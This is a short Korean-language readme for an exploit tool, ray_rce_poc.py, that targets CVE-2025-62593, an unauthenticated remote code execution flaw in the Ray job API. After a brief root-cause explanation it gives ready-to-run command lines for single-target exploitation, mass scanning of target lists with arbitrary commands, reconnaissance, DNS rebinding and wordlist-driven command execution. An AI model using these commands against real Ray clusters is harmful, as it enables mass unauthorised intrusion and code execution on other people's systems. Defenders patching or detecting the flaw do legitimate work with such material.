
CVE-2025-62593 — Ray Unauthenticated RCE Exploit는 Ray 분산 AI 컴퓨팅 엔진의 인증되지 않은 원격 코드 실행 취약점입니다.
CVE-2025-62593은 Ray 분산 AI 컴퓨팅 엔진의 인증되지 않은 원격 코드 실행 취약점입니다.
근본 원인은 중요한 HTTP 엔드포인트(/api/jobs, /api/job_agent/jobs)에 인증이 없다는 점입니다.
공격자는 엔트리포인트가 임의의 명령인 Ray Job을 제출하여 클러스터 헤드 노드에서 이를 실행할 수 있습니다.
# 단일 대상
python3 ray_rce_poc.py --target http://HOST:8265
# 대량 스캔 (동시 10개)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json
# 정찰 모드 (빠른 열거)
python3 ray_rce_poc.py --recon --targets list.txt
# DNS 리바인딩 모드
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1
# 워드리스트 스캔
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv
/api/jobs//api/jobs//api/jobs/{id}/logs